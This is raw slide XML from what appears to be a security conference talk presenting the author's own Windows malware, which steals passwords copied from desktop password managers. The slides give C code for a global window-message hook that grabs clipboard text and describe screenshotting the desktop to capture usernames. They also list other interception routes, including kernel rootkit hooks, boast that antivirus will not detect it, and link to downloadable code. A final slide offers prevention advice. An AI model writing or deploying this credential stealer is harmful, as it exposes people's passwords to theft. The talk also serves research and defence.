            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>WCHAR* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>szClipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> = (WCHAR*)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GlobalLock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(handle); // lock data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>lstrcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>( buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>szClipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> ) ;               // copy clipboard text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GlobalUnlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> (handle) ;                        // unlock data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>CloseClipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> () ;                            // close data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6985079" y="854639"/>
            <a:ext cx="2996640" cy="6676199"/>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The Hooker p1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1371599"/>
            <a:ext cx="9071640" cy="552096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2100"/>
              <a:t>The following is what our hooking procedure looks like. Note the name of the window message from our previous Spy++ session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>HHOOK hhk = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>__declspec(dllexport) void install() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>hhk = SetWindowsHookEx(WH_CALLWNDPROCRET, CallWndRetProc, hinst,0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>1st param is the window hook type. It pertains to the second param.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>2nd param is the callback function WH_CALLWNDPROCRET which watches hooks being returned from all windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>The 3rd param is the handle to the instance of the DLL (set in dll main).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t> The last param  is the thread ID. We use a for a global hook, however we can make it process specific for scope's sake</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="91440"/>
            <a:ext cx="2217240" cy="1188719"/>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528480" y="15120"/>
            <a:ext cx="2489040" cy="126504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The Hooker p2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1371599"/>
            <a:ext cx="9071640" cy="552096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2100"/>
              <a:t>LRESULT CALLBACK CallWndRetProc(int code, WPARAM wParam, LPARAM lParam){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>if(code &gt; 0){ CallNextHookEx(hhk, code, wParam, lParam);}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>if(code == HC_ACTION){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>CWPRETSTRUCT* p = (CWPRETSTRUCT*)lParam;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>if(p-&gt;message == WM_DESTROYCLIPBOARD)	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>GrabClipStuff();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>} } return CallNextHookEx(hhk, code, wParam, lParam); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>This is our callback defined with the SetWindowsHookEx function. All we are doing is instantiating a struct that contains the window message name and data inside and checking with a simple 'if' for out message. This is our event. From here we call GrabClipStuff which grabs the data we want from the clipboard to grab the password (along with the date) and a screen shot to obtain the username (also dated).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-38880" y="0"/>
            <a:ext cx="2808720" cy="1331640"/>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7269840" y="9720"/>
            <a:ext cx="2809080" cy="135072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Obtaining The Username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1371599"/>
            <a:ext cx="9071640" cy="552096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2100"/>
              <a:t>Since only the password is copied over (typically) then we're only obtaining part 1 of the 2 part auth system. We need the username, otherwise we got nothing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>The easiest way I came up with was to just take a screen shot. Keep it simple stupid. Since we know *when* the copy buffer is filled, its a simple matter of taking a screen shot of all desktop windows (in case they run 2 or more monitors) and saving the file with the time at which the buffer copy fill took place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>I am utilizing a (modified  a bunch by me) class taken from source forge for taking screen shots Called AutoScreen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>The app I wrote takes a screen shot and saves it to the C drive with a date time stamp corresponding to the password logging.</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Other Methods of Copy Buffer Interception</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1769040"/>
            <a:ext cx="9071640" cy="463680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2400" dirty="0"/>
              <a:t>1) Ripping the data from the COPYDATASTRUCT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>structure pointed to in the WM_COPYDATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>message's LPARAM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>2) The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gpnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> linked list exported by user32.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>3) Via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>windowstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> object /  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>OpenWindowStation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>() functions which store all clipboard data on a per desktop basis for Terminal Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>4) Via the kernel assuming you have some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. By hooking kernel-mode functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NtUserSetClipboardData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NtUserGetClipboardData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> we can watch for data without interacting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>userland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Both functions reside in win32k.sys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8012112" y="1314360"/>
            <a:ext cx="2051328" cy="2399039"/>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21960"/>
            <a:ext cx="9071640" cy="5201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The App In Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
            <a:videoFile r:link="rId1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-40680" y="592920"/>
            <a:ext cx="10129320" cy="6968880"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="CFE7F5"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:prstDash val="soli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41400"/>
            <a:ext cx="9071640" cy="5201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Will My AV Help Me?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1769040"/>
            <a:ext cx="9071640" cy="545616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2800" dirty="0"/>
              <a:t>Heuristic analysis focuses on common viral traits such as hooking the keyboard. Since I'm not technically hooking the keyboard, the AV won't know / care about what I'm doing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Since AV's are signature based and this is new, no signature exists and will run fine :D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3377520" y="3657600"/>
            <a:ext cx="3383280" cy="2332037"/>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3275279" y="539280"/>
            <a:ext cx="3518639" cy="128808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182160"/>
            <a:ext cx="9071640" cy="5201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Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="2669040"/>
            <a:ext cx="9071640" cy="478116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2000" dirty="0"/>
              <a:t>Every tested desktop password manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>keepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>lastpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pwdepot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pwgorilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>roboform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) used the same implementation for copying data to the copy buffer. The best way to avoid this kind of attack would be to register your own clipboard format since that would produce a unique window message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You may consider writing passwords on sticky notes again, or go the key based route.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A colleague of mine suggested just using the password manager for storing hints and not actual passwords, but then what's the point?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A variation on that would be to store the password in the manager in reverse order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The absolute greatest prevention though is to not get infected with malware. Common sense goes a long way.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3778200" y="760319"/>
            <a:ext cx="2539080" cy="187740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Download it here!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1563480"/>
            <a:ext cx="9070920" cy="236232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endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://www.gironsec.com/code/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://www.gironsec.com/blog/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207360" y="3931920"/>
            <a:ext cx="5096160" cy="3200400"/>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5577840" y="3954960"/>
            <a:ext cx="4156560" cy="317736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What we're going to cover</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1010879"/>
            <a:ext cx="9071640" cy="490392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endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>How my malware works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The System Dispatcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Window Messages &amp; Identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Window Handles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Hooking Messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>How Screwed Am I?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Gimme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Gimme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316480" y="3683879"/>
            <a:ext cx="4684680" cy="3824279"/>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7260120" y="1399680"/>
            <a:ext cx="2741039" cy="228420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Any Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137680" y="1371599"/>
            <a:ext cx="6000480" cy="5669279"/>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References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474840" y="1370520"/>
            <a:ext cx="9071640" cy="636768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r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The Code Project - http://www.codeproject.com/Articles/43694/Forbidding-the-Clipboard-for-the-specified-process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>MSDN -  http://msdn.microsoft.com/en-us/library/windows/desktop/ms649012.aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ReactOS</a:t>
